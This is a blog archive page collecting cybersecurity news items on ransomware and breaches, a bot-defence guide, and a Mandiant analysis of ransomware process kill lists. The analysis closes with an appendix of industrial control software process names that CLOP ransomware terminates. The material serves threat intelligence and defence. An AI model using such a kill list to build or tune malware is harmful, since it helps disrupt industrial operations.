Category Archives: ransomware

Cyber Security Roundup for August 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, July 2020.

The standout hack of July 2020, and possibly of the year, was the takeover of 45 celebrity Twitter accounts, in a bid to scam their millions of followers by requesting Bitcoin in tweets. 
Twitter confirms internal tools used in bitcoin-promoting attack ...
Scam Tweet
The high-profile Twitter accounts compromised included Barack Obama, Elon Musk, Kanye West, Bill Gates, Jeff Bezos, Warren Buffett, Kim Kardashian, and Joe Biden. Around £80,000 of Bitcoin was sent to the scammer's Bitcoin account before Twitter swiftly took action by deleting the scam tweets and blocking every 'blue tick' verified Twitter user from tweeting, including me

While the Twitter hack and scam dominated media headlines around the world, the attack was not the 'highly sophisticated cyber-attack' as reported by many media outlets, but it was certainly bold and clever. The attackers phoned Twitter administrative staff and blagged (socially engineered) their Twitter privilege account credentials out of them, which in turn gave the attackers access to Twitter's backend administrative system and to any Twitter account they desired. It is understood this Twitter account access was sold by a hacker on the dark web to a scammer in the days before the attack, that scammer(s) orchestrated a near-simultaneous Bitcoin scam tweets to be posted from the high profile accounts. On 31st July, law enforcement authorities charged three men for the attack, with one of the suspects disclosed as a 19-year British man from Bognor Regis.

There was a very serious critical Windows vulnerability disclosed as part the July 2020 Microsoft 'Patch Tuesday' security update release. Dubbed "SIGRed", it is a 17-year-old Remote Code Execution (RCE) vulnerability in Windows Domain Name System (DNS), a component commonly present in Microsoft Windows Server 2008, 2012, 2012R2, 2016 and 2019. Disclosed as CVE-2020-1350 it was given the highest possible CVSS score of 10.0, which basically means the vulnerability is “easy to attack” and “likely to be exploited”, although Microsoft said they hadn't seen any evidence of its exploitation at the time of their patch release.

Given SIGRed is a wormable vulnerability, it makes it particularly dangerous, as wormable malware could exploit the vulnerability to rapidly spread itself over flat networks without any user interaction, as per the WannaCry attack on the NHS and other large organisations. Secondly, it could be used to exploit privilege level accounts (i.e. admin accounts found on Servers).  The Microsoft CVE-2020-1350 vulnerability can be mitigated on effected systems by either applying the Microsoft Windows DNS Server Microsoft released patch (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350 or by applying a Registry Workaround (https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability)

At least 10 universities in the UK had student data stolen after hackers attacked Blackbaud, an education-focused cloud service provider. UK universities impacted included York, Loughborough, Leeds, London, Reading, Exeter and Oxford. According to the BBC News website, Blackbaud said "In May of 2020, we discovered and stopped a ransomware attack. Prior to our locking the cyber-criminal out, the cyber-criminal removed a copy of a subset of data from our self-hosted environment."

As expected, the UK Government ordered UK mobile network operators to remove all Huawei 5G equipment by 2027, and banning their purchase of Huawei 5G network equipment after 31st December 2020.  Digital Secretary Oliver Dowden said it follows sanctions imposed by the United States, which claims the Chinese firm poses a national security threat, which Huawei continues to resolutely deny. The ban is expected to delay the UK's 5G rollout by a year. "This has not been an easy decision, but it is the right one for the UK telecoms networks, for our national security and our economy, both now and indeed in the long run," he said. 
In some media quarters, it was suggested the UK u-turn on Huawei could lead to cyberattack repercussions after Reuter's said its sources confirmed China was behind cyberattacks on Australia's critical national infrastructure and government institutions following their trade dispute with China.

Russian Hacking Group (APT 29) was jointly accused of targeting the theft of coronavirus vaccine research by the UK NCSC, the Canadian Communication Security Establishment (CSE), United States Department for Homeland Security (DHS), Cyber-security Infrastructure Security Agency (CISA) and the US National Security Agency (NSA). The UK's National Cyber Security Centre (NCSC) said the hackers "almost certainly" operated as "part of Russian intelligence services". It did not specify which research organisations had been targeted, or whether any coronavirus vaccine research data was taken, but it did say vaccine research was not hindered by the hackers. Russia's ambassador to the UK has rejected allegations, "I don't believe in this story at all, there is no sense in it," Andrei Kelin told the BBC's Andrew Marr Show. While Foreign Secretary Dominic Raab said it is "very clear Russia did this", adding that it is important to call out this "pariah-type behaviour". 

UK sport said hackers tried to steal a £1 million club transfer fee and froze turnstiles at a football game. Cybercriminals hacked a Premier League club managing director's email account during a player transfer negotiation, the million-pound theft was only thwarted by a last-minute intervention by a bank.  Another English football club was targeted by a ransomware attack which stopped its turnstiles and CCTV systems from working, which nearly resulted in a football match being postponed. Common tactics used by hackers to attack football clubs include compromising emails, cyber-enabled fraud and ransomware to shutting down digital systems. For further information on this subject, see my extensive blog post on football club hacking, The Billion Pound Manchester City Hack.

Smartwatch maker Garmin, had their website, mobile app and customer service call centres taken down by ransomware on 23rd July 2020. Reports suggest the fitness brand had been hit by the WastedLocker ransomware strain, which is said to have been developed by individuals linked to a Russia-based hacking group called 'Evil Corp'.  According to Bleeping Computer, Garmin paid $10 million to cybercriminals to receive decryption keys for the malware on 24th or 25th July 2020.

Yet another big data exposure caused by a misconfigured AWS S3 bucket was found by security researchers, one million files of Fitness Brand 'V Shred' was discovered exposed to the world, including the personal data of 99,000 V Shred customers. Interestingly V Shred defended the researcher findings by claiming it was necessary for user files to be publicly available and denied that any PII data had been exposed.

BLOG

NEWS
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

Cyber News Rundown: Twitter Hack Arrests

Reading Time: ~ 2 min.

Multiple Individuals Charged for Twitter Hack

Three people were charged with last month’s Twitter hack, which generated over $100,000 in bitcoin by hijacking high-profile accounts. Of the 130 accounts used to spread the Bitcoin scam, major names included Elon Musk and Bill Gates, who have been portrayed in similar past scams. The FBI was apparently able to identify the perpetrators through a known hacking forum offering Twitter account hacking services for a fee.

Kentucky Unemployment Faces Second Breach in 2020

Kentucky’s unemployment system suffered its second data breach of the year last week. The breach came to light after a user reported being able to view another’s sensitive information while attempting to review their own. Officials are still uncertain how the breach occurred or the exact contents of the information available to the person who reported the incident.

Canon Suffers Ransomware Attack

Several services related to Canon, including its cloud storage systems, fell victim to a ransomware attack that knocked them offline for nearly a week. In addition to the offline systems, more than 10TB of customer data were allegedly stolen and a ransom note pertaining to the Maze Ransomware variant was identified. A large number of Canon’s website domains were also taken offline, with an internal server error being displayed to site visitors.

Havenly Interior Design Breach

A data trove containing roughly 1.4 million Havenly user accounts were posted for sale on a Dark Web marketplace last week. It included personally identifiable information of customers including names, physical addresses and emails. The company’s official statement stated no financial information was lost in the breach. While Havenly has recommended all customers update their login credentials, the breach occurred well over a month ago, enough time for affected customers to be subjected to identity theft or attacks aimed at compromising further accounts.

Massive VPN Server Password Leak

The credentials for over 900 enterprise-level VPN servers from Pulse Secure recently appeared on a hacker forum known to be frequented by ransomware groups. The plain-text information contains enough information to take full control of the servers that are currently running a firmware with known critical vulnerabilities identified within the past two months. The vulnerability that allowed this breach, CVE-2019-11510, was identified and a patch was released late last year. Many of the attack’s victims had neglected to implement the patch.

The post Cyber News Rundown: Twitter Hack Arrests appeared first on Webroot Blog.

Belarus Announces Arrest of GandCrab Ransomware Distributor

Government officials in Belarus announced they had arrested an individual on charges of having helped to distribute GandCrab ransomware. On July 30, the Ministry of Internal Affairs (MIA) of the Republic of Belarus revealed that it had arrested a 31-year-old resident of Gomel in cooperation with the United Kingdom and Romania. An investigation into the […]… Read More

The post Belarus Announces Arrest of GandCrab Ransomware Distributor appeared first on The State of Security.

Cyber News Rundown: WasteLocker Ransomware

Reading Time: ~ 2 min.

Garmin Hit with WastedLocker Ransomware

Nearly a week after the company announced they had suffered a system outage, Garmin has finally admitted to falling victim to a ransomware attack, likely from the increasingly popular WastedLocker variant. As is the norm for WastedLocker, the attack was very specific in its targeting of the company (even mentioning Garmin by name in the ransom note) and took many of their services offline. Though Garmin has confirmed that no customer data was affected, they are still unsure when their services will return to full functionality.

Israeli Marketing Firm Suffers Data Breach

More than 14 million user accounts held by the Israeli marketing firm Promo were compromised in a recent breach. Subsequently, at least 1.4 million decrypted user passwords were found for sale on a Dark Web forum, along with 22 million records containing highly sensitive information. The company has since contacted affected customers and is pushing a forced password reset.

Netwalker Ransomware Targets U.S. Government Organizations

The FBI has released a security statement concerning Netwalker ransomware attacks, which have targeted both U.S. and foreign government agencies in recent months. Netwalker is known for exploiting remote desktop utilities to compromise major enterprise networks. It also offers ransomware-as-a-service to other cybercriminals. The best methods for blocking these types of attacks is setting up two-factor authentication (2FA) and creating offline data backups to protect in case of a successful breach.

Lazarus Hacking Group Branches Out to Ransomware

The North Korean state-sponsored hacking group Lazarus has added ransomware to their latest attacks. Unfortunately for the group, the ransomware variant they’ve chosen is inefficient at encrypting data, sometimes taking up to 10 hours to fully encrypt a single system. These attacks are similar to those targeting Sony Pictures in 2014 and those that affected the 2018 Winter Olympic games, both of which are suspected to have been conducted by state-backed actors.

Nefilim Ransomware Begins Publishing Dussman Groups Data

At least 14GB of data belonging to a subsidiary of Dussmann Group, a major German MSP, is being leaked by the operators of the Nefilim ransomware variant. The operators have confirmed they were able to obtain roughly 200GB of data from the subsidiary after discovering a still-unknown method for compromising the network. Customers affected by the leak have already been notified.

The post Cyber News Rundown: WasteLocker Ransomware appeared first on Webroot Blog.

Smashing Security podcast #189: DNA cock-up, Garmin hack, and virtual kidnappings

Why are students faking their own kidnappings? What’s the story behind Garmin’s ransomware attack? And a genetic genealogy website suffers a hack or two.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Ray REDACTED.

FBI Releases Flash Alert on Netwalker Ransomware

The Federal Bureau of Investigations (FBI) released a flash alert in which it warned organizations about the dangers of Netwalker ransomware. On July 28, the FBI revealed in Flash Alert MI-000130-MW that it had received notifications of attacks involving Netwalker against U.S. and foreign government organizations along with entities operating in the healthcare and education […]… Read More

The post FBI Releases Flash Alert on Netwalker Ransomware appeared first on The State of Security.

Dussman Group Subsidiary Struck by Ransomware that Leaked Its Data

A subsidiary of the Dussman Group suffered a ransomware infection in which malicious actors stole and publicly leaked its data. As reported by Bleeping Computer, the operators of Nefilim ransomware made good on a promise made back in March to begin publishing victims’ stolen information by updating their data leaks website with a post entitled […]… Read More

The post Dussman Group Subsidiary Struck by Ransomware that Leaked Its Data appeared first on The State of Security.

How Cloud Mitigation Techniques Can Help Prevent Ransomware and Phishing Attacks

The COVID-19 pandemic revealed flaws in the American healthcare system that were always there. The only difference now is that those flaws have been brought to light. In the wake of the pandemic, a new host of cyberattacks occurred within the healthcare sector. Malicious hackers aimed to take advantage of the crisis with a combination […]… Read More

The post How Cloud Mitigation Techniques Can Help Prevent Ransomware and Phishing Attacks appeared first on The State of Security.

Ransomware is Still a Blight on Business

Ransomware is Still a Blight on Business

Trends come and go with alarming regularity in cybersecurity. Yet a persistent menace over the past few years has been ransomware. Now mainly targeting organizations rather than consumers, and with increasingly sophisticated tools and tactics at their disposal, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That’s why we need industry partnerships like No More Ransom.

Celebrating its fourth anniversary this week, the initiative has helped over four million victims fight the scourge of ransomware, saving hundreds of millions of dollars in the process. At Trend Micro, we’re proud to have played a major part, helping to decrypt over 77 million files for victims.

Not going anywhere

Ransomware has been with us for years, but only really hit the mainstream after the global WannaCry and NotPetya incidents of 2017. Unfortunately, that was just the start. Today, no sector is safe. We saw attacks rage across US municipalities, school districts and hospitals in 2019. Most recently, a major outage at a connected technology giant impacted everything from consumer fitness trackers to on-board flight systems.

Such attacks can hit victim organizations hard. There are serious reputational and financial repercussions from major service outages, and the stakes have been raised even further as attackers now often steal data before encrypting victims’ files. A recent incident at a US cloud computing provider has led to data compromise at over 20 universities and charities in the UK and North America, for example. A separate ransomware attack on a managed service provider earlier this year may cost it up to $70m.

The bad guys have shown no sign of slowing down during the pandemic — quite the reverse. Even as hospitals have been battling to save the lives of patients battling COVID-19, they’ve been targeted by ransomware designed to lock mission-critical systems.

No More Ransom

That’s why we need to celebrate public-private partnerships like No More Ransom, which provides helpful advice for victims and a free decryption tool repository. Over the past four years it has helped 4.2 million visitors from 188 countries, preventing an estimated $632 million in ransom demands finding its way into the pockets of cyber-criminals.

At Trend Micro, we’re proud to have been an associate partner from the very start, contributing our own decryption tools to the scores available today to unlock 140 separate ransomware types. Since the start of No More Ransom, Trend Micro tools have been downloaded nearly half a million times, helping over 50,000 victims globally to decrypt more than 77 million files. We simply can’t put a price on this kind of intervention.

https://www.europol.europa.eu/publications-documents/infographic-4th-anniversary-no-more-ransom 

Yet while the initiative is a vital response to the continued threat posed by ransomware, it is not all we can do. To truly beat this menace, we need to educate organizations all over the planet to improve their resilience to such malware threats. That means taking simple steps such as:

  • Backing up regularly, according to best practice 3-2-1 policy
  • Installing effective AV from a trusted vendor, featuring behavior monitoring, app whitelisting and web reputation
  • Training staff how to better spot phishing attacks
  • Ensuring software and systems are always on the latest version
  • Protecting the enterprise across endpoint, hybrid cloud, network and email/web gateways

I’m also speaking on a panel today hosted by the U.S. Chamber of Commerce on NotPetya and general ransomware attack trends related to the pandemic. Join us to learn more about ransomware from law enforcement agencies, policy makers and businesses.

If your organization has been impacted by ransomware, check the resources available on https://www.nomoreransom.org/ for advice and access to the free decryption tool repository.

The post Ransomware is Still a Blight on Business appeared first on .

Cyber News Rundown: ATM Jackpotting Attacks Rise

Reading Time: ~ 2 min.

ATM Jackpotting Attacks on the Rise

ATM manufacturer Diebold Nixdorf has identified a malicious campaign that uses proprietary software to “jackpot” the machines. The attack requires malicious actors to breach the ATM manually and then use the software to force the machine to dispense cash at a rapid rate, known within the industry as jackpotting. While these attacks don’t seem to affect customer data or finances, the company is unsure how the attackers obtained the proprietary software used in the scam.

Ransomware Locks Down Telecom Argentina

Telecom Argentina is being extorted for over $7.5 million following a ransomware attack last week. The hacker group REvil is believed to be behind the attack, which may mean the stolen data is set to be posted on the group’s auction site. Officials are still unsure of how the intrusion occurred, but it’s likely to have stemmed from a compromised remote access point.

Maryland Health Services Breach Affects Thousands

More than 40,000 individuals may have had personal information leaked after a ransomware attack on Lorien Health Services in Maryland. The breach was discovered in June, but after the healthcare provider refused to pay the ransom the hackers began publishing the stolen data, which includes Social Security Numbers and other highly sensitive information. Lorien was quick to notify affected clients and had begun offering credit monitoring services to those affected within two days of the attack being confirmed.

University of York Data Breach

The University of York in the UK has learned of a data breach that occurred in May and could affect a considerable number of students and staff. The breach itself was enabled by a third-party service provider and contained personally identifiable information on an unknown number of victims. While there is little the university can do to contain this type of attack, it comes as another reminder of the importance of supply chain data security and the knock-on effect of such attacks.

Meow Attacks Target Vulnerable Databases

Dozens of unsecured databases from Elasticsearch and MongoDB were wiped in a new malicious campaign that seems to attack indiscriminately. Discovered within the last week, the Meow attacks as they’re known appear to use an automated script to overwrite any data in vulnerable databases and destroy any remaining data. This string of attacks may encourage stronger security policies among previously lax database administrators, but the lesson is costly for affected businesses.

The post Cyber News Rundown: ATM Jackpotting Attacks Rise appeared first on Webroot Blog.

How to Prevent Hackers from Using Bad Bots To Exploit Your Website?

What Are Bad Bots?

A Bot, or internet bot, web bot, and www bot, among other similar terms, is technically a program or software that is designed to perform relatively simple tasks in an automated, repetitive way. A bot is initially designed to replace humans when performing an otherwise time-consuming or boring task.

For example, web scraping, the act of copy-pasting and saving various data and files on a website, obviously can be done by a human operator, but by using a web scraper bot, we achieve the same result in a much faster way. 

However, although bots can perform beneficial tasks, there are also bad bots that are designed to perform malicious tasks like illegally scraping unauthorized content, data thievery, and even launching a full-scale DDoS attack. 

Bad bots typically come as malware, and there are now billions of bad bots available on the internet. According to the latest data, bot activities drove almost 40% of the total internet traffic in 2018, and a lot of them are bad bots. 

Bad bot activities, at best, might slow down your website speed or launch relatively harmless spam attacks in your comment section. However, bad bots can also cause more severe cybersecurity threats like a full-scale DDoS attack or data breach.

Identifying and Monitoring Bad Bot Activities

The first and most important thing you can do about bad bot activities is to keep an eye on your website’s traffic and check whether there are any bot activities on your site. By properly identifying bot activities, we can devise a better plan to block their activities. 

Here are some basic but important ways you can identify the existence of bots on your site: 

 

  • Sign Up Authentication

 

If your website involves user accounts, a sign-up authentication via phone/SMS verification or email verification can prevent bots from registering accounts on your site, while at the same time allowing legitimate traffic to easily create an account and access your site.

 

  • Hide your site’s email address

 

Sophisticated spambots might exploit a tag that allows the bot to spam your site’s inbox, and typically this is due to a tag existing in your site’s contact form (or any other submission form on your website.) 

First, change your email address to something like “x[at]y[dot]z” instead of the usual x@y.z format. This is to prevent a spam bot from scanning your site for address. Also, choose a contact form that hides the email address that the submission goes to. If you are using a form builder, make sure the target email address is hidden in an external script. 

Implementing CAPTCHA

CAPTCHA is your site’s first layer of actual defense against bot activities, but it’s very important to note that CAPTCHAs alone are not enough to defend against today’s more sophisticated bots that can accurately mimic human behaviors. 

Nowadays, cybercriminals can also employ CAPTCHA farm services—a company/person who solves CAPTCHAs by distributing them to a pool of human workers—in combination with bot attacks. This practice will render CAPTCHAs practically useless. 

So, think of CAPTCHAs as a prerequisite defense measure rather than a one-size-fits-all answer. 

CAPTCHA stands for “Completely Automated Public Turing test to tell Computers and Humans Apart”, and is a simple test to differentiate between humans and bots. Implementing CAPTCHAs is now easier than ever, and we can easily use Google’s reCAPTCHA (which is free and pretty reliable) for our site’s CAPTCHA’s needs. 

Also, although CAPTCHAs are designed to be easily solved by human users, it will still slow down your actual users’ activity and might hurt their experience. So, use them sparingly. A good practice is to only use CAPTCHAs when the user performed suspicious activities like failing logins a specific number of times. 

Another simple but effective practice is to implement CAPTCHA (or completely block) outdated browsers or user agent strings. In general, you should block browsers that are more than 3 years old and CAPTCHA those that are 2 years old or above. 

Other Protective Measures

Here are other cybersecurity measures that can be effective in preventing bad bots on your website:

 

  • Using robots. Txt. Configuring your robots.txt file in the website’s index can be effective in blocking bots. The robots.txt file essentially tells bots which pages that are allowed to be crawled by bots. However, robots.txt might not be enough to block sophisticated and aggressive bots but can be a decent safety measure for basic bots and overly-aggressive crawlers. 
  • Multi-factor authentication. Multi-factor authentication (or more commonly two-factor authentication) requires users to provide additional information besides their passwords, for example, a fingerprint/iris scan or a verification PIN. This can help in events when a bot cracks the actual credentials. 
  • WAF: Web-application Firewalls (WAFs) can now employ advanced methods to stop bot traffic even before any interaction with the site.

 

Advanced Bot Detection Measures

With how bad bots are becoming much more sophisticated and advanced at mimicking human behaviors, advanced detection are necessary mainly via A.I.-driven technologies which can perform the following advanced detection techniques: 

 

  • Behavioral detection

 

As the name suggests, this detection focuses on detecting and analyzing traffic behaviors to differentiate between human behaviors and bot behaviors. This includes detecting aspects like linear/non-linear mouse movements, typing habits, form submission speed, and so on. 

Today’s fourth-generation bots are really good at mimicking human behaviors, but advanced behavioral detection technology can detect the difference.

 

  • Fingerprinting

 

In fingerprinting-based detection, we aim to obtain as much information on the incoming traffic from basic information like IP address (although not very effective nowadays), devices used, browsers used, and so on. 

The common approach here is to check the presence of browser attributes added by modified browsers (headless browsers) like Nightmare, PhantomJS, Puppeteer, Selenium, and other headless browsers. 

Another approach is to check for consistency for repeated logins like browser consistency and OS consistency. 

End Words

Ideally, preventing the activities of bad bots should be automated as possible to ensure the earliest possible detection and avoiding false positives (mistakenly blocking legitimate human users as bots). 

With how there are so many bad bot activities and how bots have evolved to be much more sophisticated than ever, an advanced bot detection and protection software by DataDome is no longer a luxury, but a necessity to prevent various cybersecurity threats from data scraping to DDoS to full-blown data breaches. 

The post How to Prevent Hackers from Using Bad Bots To Exploit Your Website? appeared first on Hacker Combat.

Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families

Mandiant Threat Intelligence has researched and written extensively on the increasing financially motivated threat activity directly impacting operational technology (OT) networks. Some of this research is available in our previous blog posts on industrial post-compromise ransomware and FireEye's approach to OT security. While most of the actors behind this activity likely do not differentiate between IT and OT or have a particular interest in OT assets, they are driven by the goal of making money and have demonstrated the skills needed to operate in these networks. For example, the shift to post-compromise ransomware deployment highlights the actors’ ability to adapt to more complex environments.

In this blog post we look further into this trend by examining two different process kill lists containing OT processes which we have observed deployed alongside a variety of ransomware samples and families. We think it is likely that these lists were the result of coincidental asset scanning in victim organizations and not specific targeting of OT. While this judgement may initially seem like good news to defenders, this activity still indicates that multiple, very prolific, financially motivated threat actors are active inside organizations’ OT—based on the contents of these process kill lists—with the intent of profiting from the ransom of stolen information and disrupted services.

Two Unique Process Kill Lists Deployed Alongside Seven Ransomware Families Include OT Processes

Threat actors often deploy process kill lists alongside or as part of ransomware to terminate anti-virus products, stop alternative detection mechanisms, and remove file locks to ensure critical data is encrypted. As a result, the deployment of these lists increases the likelihood of a successful attack (MITRE ATT&CK T1489). In post compromise ransomware attacks, attackers regularly tailor the lists to include processes that are relevant to the victim’s environment. By stopping these processes, the attacker makes sure to encrypt data from critical systems, which may remain unaffected if the process is currently in use. As the likelihood of crippling critical systems increases, the target is more likely to suffer impacts on its physical production.

First Process Kill List Has Been Leveraged By At Least Six Ransomware Families

Mandiant identified samples of at least six ransomware families (DoppelPaymer, LockerGoga, Maze, MegaCortex, Nefilim and SNAKEHOSE)—all of which have been associated with high-profile incidents impacting industrial organizations over the past two years—that have leveraged a common process kill list containing 1,000+ processes. The list, which we briefly discussed in an earlier blog post from February 2020, includes a couple dozen processes related to OT executables—mainly from General Electric Proficy, a suite used for historians and human-machine interfaces (HMIs). We note, that while the inclusion of these processes in this kill list could result in limited loss of view of historical process data, it is not likely to directly impact the operator’s ability to control the physical process itself.


Figure 1: Snippets from “kill.bat” deployed alongside LockerGoga (L) and MegaCortex process kill list (R)

The earliest iteration we identified of the shared kill list was a batch script deployed alongside LockerGoga (MD5: 34187a34d0a3c5d63016c26346371b54) in January 2019 (Figure 1). Other iterations of the list we have observed are also hardcoded directly into the ransomware binaries. The different techniques used to deploy the process kill list, the use of different malware families, and slight variations between each list iteration (mainly typos in the processes, e.g.: a2guard.exea2start.exe; nexe; proficyclient.exe) indicate that likely more than one actor had access to the true source of the process kill list. This source could be for example a post of processes shared on a dark web forum, or an independent actor sharing the compiled list with other actors.

We think it is likely that the OT processes identified in this list simply represent the coincidental output of automated process collection from victim environment(s) and not a targeted effort to impact OT. This is supported by the relatively limited and specific selection of OT-related processes, rather than a broader selection of many vendors and OT-related processes that would have been suggestive of targeted external research. Regardless, this does not downplay the significance of the inclusion of OT processes in the list, as it suggests that sophisticated financially motivated actors, such as FIN6, have had at least some visibility into a victim’s OT network. As a result, the actors were able to tailor their malware to impact those systems, without the explicit intent to target OT assets.

Most types of ransomware attacks in OT environments will result in the disruption of services and a temporary loss of view into current and historical process data. However, OT environments impacted by a ransomware that leverages this kill list and happen to be running one or more of the processes used by the initial victim(s)—and therefore are included on the list—may face additional impacts. For example, historian databases would be more likely to be encrypted, possibly resulting in loss of historical data. Other impacts could include gaps in the collection of process data corresponding to the duration of the outage and temporary loss of access to licensing rights for critical services.

Second List Deployed Alongside CLOP Ransomware Sample Has a Higher Chance of Impacting OT Systems

Mandiant analyzed a second, entirely unrelated sample of ransomware (MD5: 3b980d2af222ec909b948b6bbdd46319) from the CLOP family with a hardcoded list for enumeration and termination of processes that includes a number of OT strings. The list contains over 1,425 processes, from which at least 150 belong to OT-related software suites (Figure 2 and Appendix).

Based on our analysis, the CLOP malware family’s process kill list has grown over time possibly as more processes are scanned during different compromises. While we do not currently hold enough information to describe the exact mechanism used by the actor to grow the list, it appears to have resulted from actor reconnaissance across multiple victims. We have observed the threat actor employing process discovery procedures, including running the tasklist utility. This indicates that the actor scanned for processes in at least one victim’s OT network(s) before deploying the ransomware.


Figure 2: Subset of processes in observed CLOP sample

CLOP is also interesting as we have only observed a single unique and very prolific financially motivated threat actor leveraging the malware family. The group, who has been active since at least 2016 and potentially as early as 2014, is known for operating large phishing campaigns to distribute malware and typically monetizes intrusions through ransomware deployment. As highlighted by their versatility and long history in financially motivated intrusions, the actor’s activity in OT networks is likely no more than an additional step in the process for monetization. However, the financial motivations of the actor again do not imply low risk to OT. Instead, our analysis of the CLOP sample’s kill list indicates that the included processes actually have greater potential to disrupt OT systems than those included in the shared list described above.

Unlike the first kill list, the CLOP sample includes a list of processes that, if stopped, may directly impact the operator’s ability to both visualize and control production. This is especially true in the case of some included processes that support HMI and PLC supervision. Some of the OT processes present in the CLOP sample are related to the following products:

Vendor

Product

Description

Siemens

SIMATIC WinCC

SCADA system, common for process control and automation.

Beckhoff

TwinCAT

Software for PC-based process control and automation.

National Instruments

Data Acquisition Software (DAQ)

Software used to acquire data from sensors and conditioning devices.

Kepware

KEPServer EX

Software platform that collects information from industrial devices and sends the output to SCADA applications.

OPC Unified Architecture (OPC-UA)

N/A

Communication protocol for data acquisition and exchange between industrial equipment and enterprise systems. 

Table 1: Examples of products related to OT processes included in identified CLOP kill list

While it is likely the physical processes this software controls would continue to operate even if the software processes were terminated unexpectedly, stopping the software processes included in the CLOP sample’s kill list could result in the loss of view/control over those physical processes due to the inability of operators to interact with the equipment. This can be caused not only by the ransomware’s disruption of intermediary systems, but also by the loss of access to relevant files on HMIs/EWS required for the operation of process control and monitoring software–for example configurations or project files. This could prolong the mean time to recovery (MTTR) of impacted environments without offline backups. In the CLOP sample list, we also identified specialized processes for software application design and testing that may also become corrupted at the time of encryption.

Process Kill Lists Are Just An Observable Indicating Broader Financially Motivated Interest In OT

Financially motivated threat actors leverage a large variety of tactics and techniques to obtain data that they can later use to generate profits. While financial actors have historically posed little to no threat to OT systems, the recent uptick in ransomware and extortion incidents highlights that industrial operations are increasingly at risk. Although we have not observed any financially motivated actors explicitly targeting OT systems, our research into process kill lists deployed with or alongside ransomware samples shows that at least two sophisticated financial actors have expanded their access into OT networks during their regular intrusions.

This increasing exposure of OT to financially motivated threat activity is no surprise, given that TTPs used by cybercriminals increasingly resemble those employed by sophisticated actors. We have consistently conveyed this message since at least 2018, when we publicly discussed the commodity and custom IT tools leveraged by the TRITON attacker while traversing through its targets’ networks (Figure 3). The likelihood of financially motivated actors impacting OT while seeking to monetize intrusions will continue to rise for the following reasons:


Figure 3: TTPs seen across both IT and OT incidents

  • Financially-motivated threat actors moving to a post-compromise ransomware model will continue to evolve and find ways to reach the most critical systems of organizations as part of their mission of monetization. As these actors are mainly driven by profits, they are not likely to differentiate between IT and OT assets.
  • OT organizations will continue to struggle to evolve at the same pace as cyber criminals. As a result, small weaknesses such as misconfigurations, exposed vulnerabilities or improper segmentation will be enough for financial actors to gain access to networks in their attempts to profit from intrusions.
  • As the market for OT solutions continues to incorporate IT services and features into broadly adopted products, we expect the convergence of technologies to result in a broader attack surface for financial threat actors to target.
  • The TTPs employed by both financial and sophisticated nation-state actors often rely on intermediary systems as stepping stones through intrusions. As a result, the skills of both groups hold similar potential of reaching OT systems even when financial groups may only do so coincidentally or as part of their monetization strategy.

Outlook

As OT networks continue to become more accessible to threat actors of all motivations, security threats that have historically impacted primarily IT are becoming more commonplace. This normalization of OT as just another network from the threat actor perspective is problematic for defenders for many of the reasons discussed above. This recent threat activity should be taken as a wake-up call for two main reasons: the various security challenges commonly faced by organizations to protect OT networks, and the significant consequences that may arise from security compromises even when they are not explicitly designed to target production systems. Asset owners need to look at OT security with the mindset that it is not if you will have a breach, but when. This shift in thinking will allow defenders to better prepare to respond when an incident does happen, and can help reduce the impact of an incident by orders of magnitude.   

Appendix: Selection Of OT Processes From CLOP Kill List

Process Name

Vendor

ACTLICENSESERVER.EXE

Atlas Copco

TCATSYSSRV.EXE

Beckhoff

TCEVENTLOGGER.EXE

Beckhoff

TCR.EXE

Beckhoff

ALARMMANAGER.EXE

GE

S2.EXE

Honeywell

BR.ADI.DISPLAY.BRIGHTNESS.EXE

B&R

BR.ADI.SERVICE.EXE

B&R

BR.ADI.UPS.MANAGER.EXE

B&R

BR.ADI.UPS.SERVICE.EXE

B&R

BR.AS.UPGRADESERVICE.EXE

B&R

BRAUTHORIZATIONSVC.EXE

B&R

BRTOUCHSVC.EXE

B&R

OPCROUTER4SERVICE.EXE

Inray Industriesoftware

OPCROUTERCONFIG.EXE

Inray Industriesoftware

SERVER_EVENTLOG.EXE

Kepware

SERVER_RUNTIME.EXE

Kepware

NICELABELAUTOMATIONSERVICE2017.EXE

NiceLabel

NICELABELPROXY.EXE

NiceLabel

NICELABELPROXYSERVICE2017.EXE

NiceLabel

APPLICATIONWEBSERVER.EXE

National Instruments

CWDSS.EXE

National Instruments

NIAUTH_DAEMON.EXE

National Instruments

NIDEVMON.EXE

National Instruments

NIDISCSVC.EXE

National Instruments

NIDMSRV.EXE

National Instruments

NIERSERVER.EXE

National Instruments

NILXIDISCOVERY.EXE

National Instruments

NIMDNSRESPONDER.EXE

National Instruments

NIMXS.EXE

National Instruments

NIPXICMS.EXE

National Instruments

NIROCO.EXE

National Instruments

NISDS.EXE

National Instruments

NISVCLOC.EXE

National Instruments

NIWEBSERVICECONTAINER.EXE

National Instruments

SYSTEMWEBSERVER.EXE

National Instruments

OPC.UA.DISCOVERYSERVER.EXE

OPC

OPCUALDS.EXE

OPC

ANAWIN.EXE

AUTEM

ASM.EXE

Possibly Siemens

PARAMETRIC.EXE

PTC

QDAS_O-QIS.EXE

Q-Das

QDAS_PROCELLA.EXE

Q-Das

QDAS_QS-STAT.EXE

Q-Das

QDASIDI_SRV.EXE

Q-Das

SPCPROCESSLINK.EXE

Q-Das

TAGSRV.EXE

Rockwell Automation or National Instruments

_SIMPCMON.EXE

Siemens

ALMPANELPLUGIN.EXE

Siemens

ALMSRV64X.EXE

Siemens

ALMSRVBUBBLE64X.EXE

Siemens

CC.TUNNELSERVICEHOST.EXE

Siemens

CCAEPROVIDER.EXE

Siemens

CCAGENT.EXE

Siemens

CCALGRTSERVER.EXE

Siemens

CCARCHIVEMANAGER.EXE

Siemens

CCCAPHSERVER.EXE

Siemens

CCCSIGRTSERVER.EXE

Siemens

CCDBUTILS.EXE

Siemens

CCDELTALOADER.EXE

Siemens

CCDMRUNTIMEPERSISTENCE.EXE

Siemens

CCECLIENT_X64.EXE

Siemens

CCECLIENT.EXE

Siemens

CCESERVER_X64.EXE

Siemens

CCESERVER.EXE

